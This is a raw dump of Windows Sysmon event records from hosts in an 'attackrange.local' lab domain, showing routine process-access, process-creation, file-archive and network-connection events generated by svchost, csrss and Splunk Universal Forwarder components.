07:49:27.700{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807068Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:49:27.700{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807067Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.684{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807066Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.684{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F407-60EB-6379-00000000D001}2452C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807065Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.684{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F407-60EB-6379-00000000D001}2452C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807064Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.685{0C1E0330-F407-60EB-6379-00000000D001}2452C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807063Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.575{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37A3765D75864B3162D3CEA2F6EDC084,SHA256=1CF3EED13895FD355211773278CDE7C65CF3AB150D20D7FD5D3DA1DE693C3E30,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047815Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:19.711{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50987-false10.0.1.12-8000- 23542300x80000000000000001047814Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:27.128{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6222E12166CBA5C70A7A351588EAF87,SHA256=185FBAAD7366C6F247E694EF39C850D933C12F1A41FAE19F408575007A474110,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807062Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:25.348{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57228-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000807061Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.153{0C1E0330-F406-60EB-6279-00000000D001}40203180C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807060Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.013{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F406-60EB-6279-00000000D001}4020C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807059Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:49:27.013{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807058Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.013{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807057Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:49:27.013{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807056Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.013{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807055Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:49:27.013{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807054Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.013{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807053Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:49:27.013{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807052Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.013{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807051Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:49:27.013{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807050Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.013{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F406-60EB-6279-00000000D001}4020C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807049Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.013{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F406-60EB-6279-00000000D001}4020C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807048Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:26.998{0C1E0330-F406-60EB-6279-00000000D001}4020C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807093Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:28.778{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89CF12A1BE537F0CF93B43803612A352,SHA256=4EAA2546CDAAEA4E9CFF7A1F3DB76DE40B42714BE6AE89958EE7393E3A39A2C4,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001047818Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:28.758{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F3F80ABD4E8703E0C8A7E7BBE5DFDC5F,SHA256=0A8C2A9023791A2C6343CA2DE643F69D2D668D83A5A0B9D3CFF05B6EDDF9B2C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047817Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:28.758{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=29120A9617EBEDE0A5C1489BBBA39752,SHA256=3029307A241062588FA950E6A17AC7CC5B5917FDA7E2A4C18E753F05D3195B6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047816Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:28.143{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C2788614AA91D2C24765FFC509DF1C5,SHA256=88D1F81A7C7BF38E5EC5E8A1B49A918FF9CB87B17131915B5585D05F7A69BE44,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807092Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:28.528{0C1E0330-F408-60EB-6479-00000000D001}14924004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807091Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:28.388{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F408-60EB-6479-00000000D001}1492C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807090Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:28.388{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807089Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
